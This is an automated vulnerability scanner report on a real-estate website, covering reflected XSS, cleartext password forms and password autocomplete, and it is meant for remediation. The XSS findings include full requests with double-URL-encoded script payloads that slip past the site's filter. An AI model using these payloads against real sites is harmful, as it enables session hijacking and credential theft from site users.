newenglandmoves.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

XSS in newenglandmoves.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Wed Jan 05 13:11:37 CST 2011.



CWE-79 XSS Report

Loading

1. Cross-site scripting (reflected)

1.1. http://www.newenglandmoves.com/real-estate/property-search [REST URL parameter 2]

1.2. http://www.newenglandmoves.com/real-estate/property-search [REST URL parameter 2]

1.3. http://www.newenglandmoves.com/real-estate/recent-sales-search [REST URL parameter 2]

1.4. http://www.newenglandmoves.com/real-estate/recent-sales-search [REST URL parameter 2]

1.5. http://www.newenglandmoves.com/real-estate/sales-associates [REST URL parameter 2]

1.6. http://www.newenglandmoves.com/real-estate/sales-associates [REST URL parameter 2]

2. Cleartext submission of password

2.1. http://www.newenglandmoves.com/

2.2. http://www.newenglandmoves.com/accounts/login

2.3. http://www.newenglandmoves.com/accounts/register

3. Password field with autocomplete enabled

3.1. http://www.newenglandmoves.com/

3.2. http://www.newenglandmoves.com/

3.3. http://www.newenglandmoves.com/accounts/login

3.4. http://www.newenglandmoves.com/accounts/register

4. Email addresses disclosed

4.1. http://www.newenglandmoves.com/careers/real-estate-license-courses

4.2. http://www.newenglandmoves.com/contact_us/email_us

4.3. http://www.newenglandmoves.com/javascripts/cached_base.js

4.4. http://www.newenglandmoves.com/javascripts/jquery.hoverIntent.min.js

5. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 6 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.newenglandmoves.com/real-estate/property-search [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newenglandmoves.com
Path:   /real-estate/property-search

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fbf0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a7fef5a0a4 was submitted in the REST URL parameter 2. This input was echoed as 2fbf0"><script>alert(1)</script>6a7fef5a0a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /real-estate/property-search2fbf0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a7fef5a0a4 HTTP/1.1
Host: www.newenglandmoves.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; __utmz=63899184.1294253524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63899184.1764409909.1294253524.1294253524.1294253524.1; __utmc=63899184; __utmb=63899184.1.10.1294253524;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 19:02:03 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 58
ETag: "c09abcd0431d8bacb35de10181c81bee"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; path=/; expires=Wed, 05 Jan 2011 20:02:03 GMT; HttpOnly
Content-Length: 32732
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-equiv="cont
...[SNIP]...
<meta content="NewEnglandMoves.com can help you find Property Search2fbf0"><script>alert(1)</script>6a7fef5a0a4 homes for sale, Property Search2fbf0">
...[SNIP]...

1.2. http://www.newenglandmoves.com/real-estate/property-search [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newenglandmoves.com
Path:   /real-estate/property-search

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1977d%253cscript%253ealert%25281%2529%253c%252fscript%253e3fe837d9379 was submitted in the REST URL parameter 2. This input was echoed as 1977d<script>alert(1)</script>3fe837d9379 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /real-estate/property-search1977d%253cscript%253ealert%25281%2529%253c%252fscript%253e3fe837d9379 HTTP/1.1
Host: www.newenglandmoves.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; __utmz=63899184.1294253524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63899184.1764409909.1294253524.1294253524.1294253524.1; __utmc=63899184; __utmb=63899184.1.10.1294253524;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 19:02:05 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 55
ETag: "4dbf777929afe76b2139b4c31b037ee5"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; path=/; expires=Wed, 05 Jan 2011 20:02:05 GMT; HttpOnly
Content-Length: 32632
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-equiv="cont
...[SNIP]...
<li>Property Search1977d<script>alert(1)</script>3fe837d9379 Real Estate</li>
...[SNIP]...

1.3. http://www.newenglandmoves.com/real-estate/recent-sales-search [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newenglandmoves.com
Path:   /real-estate/recent-sales-search

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 719c8%253cscript%253ealert%25281%2529%253c%252fscript%253e82bb3cf3c54 was submitted in the REST URL parameter 2. This input was echoed as 719c8<script>alert(1)</script>82bb3cf3c54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /real-estate/recent-sales-search719c8%253cscript%253ealert%25281%2529%253c%252fscript%253e82bb3cf3c54 HTTP/1.1
Host: www.newenglandmoves.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; __utmz=63899184.1294253524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63899184.1764409909.1294253524.1294253524.1294253524.1; __utmc=63899184; __utmb=63899184.1.10.1294253524;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 19:02:03 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 44
ETag: "c4fc8ab2e3fbeae8caf4a2178d981ede"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; path=/; expires=Wed, 05 Jan 2011 20:02:03 GMT; HttpOnly
Content-Length: 32760
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-equiv="cont
...[SNIP]...
<li>Recent Sales Search719c8<script>alert(1)</script>82bb3cf3c54 Real Estate</li>
...[SNIP]...

1.4. http://www.newenglandmoves.com/real-estate/recent-sales-search [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newenglandmoves.com
Path:   /real-estate/recent-sales-search

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 794b5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e1b1be9e81 was submitted in the REST URL parameter 2. This input was echoed as 794b5"><script>alert(1)</script>1e1b1be9e81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /real-estate/recent-sales-search794b5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e1b1be9e81 HTTP/1.1
Host: www.newenglandmoves.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; __utmz=63899184.1294253524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63899184.1764409909.1294253524.1294253524.1294253524.1; __utmc=63899184; __utmb=63899184.1.10.1294253524;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 19:02:01 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 74
ETag: "3819db7af29847f4e7cbf5eb40f5fb66"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; path=/; expires=Wed, 05 Jan 2011 20:02:01 GMT; HttpOnly
Content-Length: 32860
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-equiv="cont
...[SNIP]...
<meta content="NewEnglandMoves.com can help you find Recent Sales Search794b5"><script>alert(1)</script>1e1b1be9e81 homes for sale, Recent Sales Search794b5">
...[SNIP]...

1.5. http://www.newenglandmoves.com/real-estate/sales-associates [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newenglandmoves.com
Path:   /real-estate/sales-associates

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19775%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef09e84b144 was submitted in the REST URL parameter 2. This input was echoed as 19775"><script>alert(1)</script>f09e84b144 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /real-estate/sales-associates19775%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef09e84b144 HTTP/1.1
Host: www.newenglandmoves.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; __utmz=63899184.1294253524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63899184.1764409909.1294253524.1294253524.1294253524.1; __utmc=63899184; __utmb=63899184.1.10.1294253524;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 19:01:59 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 160
ETag: "757e8e1b4d1eba2282781ec0fd941b49"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; path=/; expires=Wed, 05 Jan 2011 20:01:59 GMT; HttpOnly
Content-Length: 32732
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-equiv="cont
...[SNIP]...
<meta content="NewEnglandMoves.com can help you find Sales Associates19775"><script>alert(1)</script>f09e84b144 homes for sale, Sales Associates19775">
...[SNIP]...

1.6. http://www.newenglandmoves.com/real-estate/sales-associates [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newenglandmoves.com
Path:   /real-estate/sales-associates

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4b554%253cscript%253ealert%25281%2529%253c%252fscript%253e00cbec42844 was submitted in the REST URL parameter 2. This input was echoed as 4b554<script>alert(1)</script>00cbec42844 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /real-estate/sales-associates4b554%253cscript%253ealert%25281%2529%253c%252fscript%253e00cbec42844 HTTP/1.1
Host: www.newenglandmoves.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; __utmz=63899184.1294253524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63899184.1764409909.1294253524.1294253524.1294253524.1; __utmc=63899184; __utmb=63899184.1.10.1294253524;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 19:02:00 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 42
ETag: "a7954491c7a93aca23b02d626c4fa84b"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; path=/; expires=Wed, 05 Jan 2011 20:02:01 GMT; HttpOnly
Content-Length: 32664
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-equiv="cont
...[SNIP]...
<li>Sales Associates4b554<script>alert(1)</script>00cbec42844 Real Estate</li>
...[SNIP]...

2. Cleartext submission of password  previous  next
There are 3 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


2.1. http://www.newenglandmoves.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newenglandmoves.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.newenglandmoves.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 18:52:27 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 36
ETag: "abf3ce16ab89d883291d53eb40e4d74e"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; path=/; expires=Wed, 05 Jan 2011 19:52:27 GMT; HttpOnly
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">


<head>
<meta http-equiv=
...[SNIP]...
<div id="account_form">
<form action="/accounts/login?_sid=b720a5b9e00f38f151dd99e693e2aac2" class="submit_on_enter" id="login_form" method="post"><div style="margin:0;padding:0;display:inline">
...[SNIP]...
</label>
<input id="account_session_password" maxlength="30" name="account_session[password]" size="30" tabindex="21" type="password" />
</div>
...[SNIP]...

2.2. http://www.newenglandmoves.com/accounts/login  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newenglandmoves.com
Path:   /accounts/login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /accounts/login HTTP/1.1
Host: www.newenglandmoves.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; __utmz=63899184.1294253524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63899184.1764409909.1294253524.1294253524.1294253524.1; __utmc=63899184; __utmb=63899184.1.10.1294253524;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 19:02:09 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 20
ETag: "b43981bbd782d835c8995e798b4a3a14"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; path=/; expires=Wed, 05 Jan 2011 20:02:09 GMT; HttpOnly
Content-Length: 20795
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-equiv="cont
...[SNIP]...
</div>

<form action="/accounts/login" class="submit_on_enter" id="login_form" method="post"><div style="margin:0;padding:0;display:inline">
...[SNIP]...
</label>
<input id="account_session_password" maxlength="30" name="account_session[password]" size="30" tabindex="21" type="password" />
</div>
...[SNIP]...

2.3. http://www.newenglandmoves.com/accounts/register  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newenglandmoves.com
Path:   /accounts/register

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /accounts/register HTTP/1.1
Host: www.newenglandmoves.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; __utmz=63899184.1294253524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63899184.1764409909.1294253524.1294253524.1294253524.1; __utmc=63899184; __utmb=63899184.1.10.1294253524;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 19:02:09 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 37
ETag: "fde28716c0e616f217cc5cf02b0ba766"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; path=/; expires=Wed, 05 Jan 2011 20:02:09 GMT; HttpOnly
Content-Length: 24672
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-equiv="cont
...[SNIP]...
<div class="account_registration">

<form action="/accounts/register" class="new_account" id="account_registration" method="post"><div style="margin:0;padding:0;display:inline">
...[SNIP]...
</label>
<input id="account_password" maxlength="30" name="account[password]" size="30" tabindex="2" type="password" />
</div>
...[SNIP]...
</label>
<input id="account_password_confirmation" maxlength="30" name="account[password_confirmation]" size="30" tabindex="3" type="password" />
</div>
...[SNIP]...

3. Password field with autocomplete enabled  previous  next
There are 4 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


3.1. http://www.newenglandmoves.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.newenglandmoves.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.newenglandmoves.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 18:53:52 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 57
ETag: "334d70547e79c821bd95f652d0fc20b6"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _sid=c40d4539510307afc3cef3af236079da; path=/; expires=Wed, 05 Jan 2011 19:53:52 GMT; HttpOnly
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">


<head>
<meta http-equiv=
...[SNIP]...
<div id="account_form">
<form action="/accounts/login?_sid=c40d4539510307afc3cef3af236079da" class="submit_on_enter" id="login_form" method="post"><div style="margin:0;padding:0;display:inline">
...[SNIP]...
</label>
<input id="account_session_password" maxlength="30" name="account_session[password]" size="30" tabindex="21" type="password" />
</div>
...[SNIP]...

3.2. http://www.newenglandmoves.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.newenglandmoves.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.newenglandmoves.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 18:52:27 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 36
ETag: "abf3ce16ab89d883291d53eb40e4d74e"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; path=/; expires=Wed, 05 Jan 2011 19:52:27 GMT; HttpOnly
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">


<head>
<meta http-equiv=
...[SNIP]...
<div id="account_form">
<form action="/accounts/login?_sid=b720a5b9e00f38f151dd99e693e2aac2" class="submit_on_enter" id="login_form" method="post"><div style="margin:0;padding:0;display:inline">
...[SNIP]...
</label>
<input id="account_session_password" maxlength="30" name="account_session[password]" size="30" tabindex="21" type="password" />
</div>
...[SNIP]...

3.3. http://www.newenglandmoves.com/accounts/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.newenglandmoves.com
Path:   /accounts/login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /accounts/login HTTP/1.1
Host: www.newenglandmoves.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; __utmz=63899184.1294253524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63899184.1764409909.1294253524.1294253524.1294253524.1; __utmc=63899184; __utmb=63899184.1.10.1294253524;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 19:02:09 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 20
ETag: "b43981bbd782d835c8995e798b4a3a14"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; path=/; expires=Wed, 05 Jan 2011 20:02:09 GMT; HttpOnly
Content-Length: 20795
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-equiv="cont
...[SNIP]...
</div>

<form action="/accounts/login" class="submit_on_enter" id="login_form" method="post"><div style="margin:0;padding:0;display:inline">
...[SNIP]...
</label>
<input id="account_session_password" maxlength="30" name="account_session[password]" size="30" tabindex="21" type="password" />
</div>
...[SNIP]...

